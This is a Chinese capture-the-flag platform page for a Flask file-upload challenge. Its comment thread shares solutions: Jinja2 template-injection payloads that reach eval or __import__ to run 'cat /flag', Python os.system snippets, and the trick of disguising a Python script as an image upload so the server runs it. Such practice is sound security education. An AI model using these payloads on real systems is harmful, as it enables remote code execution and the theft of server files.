Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 11024
提  示:
描  述:
Flask_FileUpload
评论
Shoejust13 2年前

print("t-->{{''.__class__.__mro__[-1].__subclasses__()[177].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}}<!--t")#另解法

回复 2
timtoc 27天前

@1745090646 url/{{config.__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}},回车后页面显示404.not found是咋回事大佬

回复 0

1745090646 2年前

这个在那种回显容易看的那种好用,但是这道题,需要找子类在哪个位子,直接用{{config.__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}}就行,不过谢谢你让我想到这个方法

回复 3

asdda 2年前

6666

回复 0

2773584039 2年前

666

回复 0

innocence 2年前

为什么我的py文件运行出来说“'cat' 不是内部或外部命令,也不是可运行的程序或批处理文件”呢?是我的编译环境没设置好吗 求解答

回复 0

ggtiancai 2年前

import os os.system('ls /') #列出根目录下所有文件 os.system('cat /flag')

回复 0

dust 2年前

print(open('/flag','r').read())

回复 2

◔̯◔ 2年前

上传成功后,朋友和我上传的文件格式和文件名一样,他出flag了,但是我的提示了<!-- sh: cat/flag: not found -->

回复 0
linuxweb321 2年前

是cat空格/flag,你报错说没有cat/flag这个命令

回复 3

snnxyss 2年前

提示说会执行python代码,调用python可以执行外部命令的函数,查看就行

回复 0

菜咩一只 2年前

import os 换行 os.system('cat /flag')

回复 2

liyoung2008 2年前

#! /usr/bin/env python #-*- encoding=utf-8 -*- import os os.system('cat /flag') #将上述代码保存到txt, 然后改后缀名为png 或jpg == ,提交。按F12,拿flag

回复 3

WriteUp

image
国家级划水运动员

3 金币

评分(19)

解题动态

CLX1216115 攻破了该题 50分钟前
ArthurMorgan 攻破了该题 56分钟前
montgo 攻破了该题 1小时前
江户川 攻破了该题 1小时前
1554701214 攻破了该题 13小时前
13627713954 攻破了该题 14小时前
viator 攻破了该题 14小时前
to5ny 攻破了该题 18小时前
小白出道 攻破了该题 20小时前
foamsn 攻破了该题 20小时前
Testman 攻破了该题 20小时前
2875517502 攻破了该题 20小时前
scicoc 攻破了该题 21小时前
star_evil 攻破了该题 21小时前
sscx_xxy 攻破了该题 21小时前
2276491734 攻破了该题 22小时前
salmon 攻破了该题 22小时前
林士仲11 攻破了该题 1天前
19163302825 攻破了该题 1天前
Dovir 攻破了该题 1天前